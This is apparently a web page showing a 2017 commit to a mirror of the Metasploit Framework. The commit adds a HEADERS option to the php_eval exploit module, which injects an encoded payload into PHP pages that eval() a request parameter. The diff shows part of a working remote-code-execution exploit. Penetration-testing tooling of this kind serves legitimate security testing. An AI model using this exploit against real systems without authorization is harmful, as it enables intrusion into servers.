infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #8698, Add HEADERS to php_eval module

bug/bundler_fix
Brent Cook 2017-08-14 09:54:22 -04:00
parent 9fdf2ca1f4 55cbd9b6a9
commit b8f56d14e0
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
1 changed files with 15 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
modules/exploits/unix/webapp/php_eval.rb
View File

@ -45,6 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
register_options(
[
OptString.new('URIPATH', [ true, "The URI to request, with the eval()'d parameter changed to !CODE!", '/test.php?evalme=!CODE!']),
OptString.new('HEADERS', [false, "Any additional HTTP headers to send, cookies for example. Format: \"header:value,header2:value2\""])
])
end
@ -60,6 +61,18 @@ class MetasploitModule < Msf::Exploit::Remote
return Exploit::CheckCode::Safe
end
def datastore_headers
headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ""
headers_hash = {}
if headers && !headers.empty?
headers.split(',').each do |header|
key, value = header.split(':')
headers_hash[key] = value.strip
end
end
headers_hash
end
def exploit
# very short timeout because the request may never return if we're
# sending a socket payload
@ -75,10 +88,9 @@ class MetasploitModule < Msf::Exploit::Remote
response = send_request_raw({
'global' => true,
'uri' => uri,
'headers' => {
'headers' => datastore_headers.merge(
headername => payload.encoded,
'Connection' => 'close'
}
'Connection' => 'close')
},timeout)
if response and response.code != 200
print_error("Server returned non-200 status code (#{response.code})")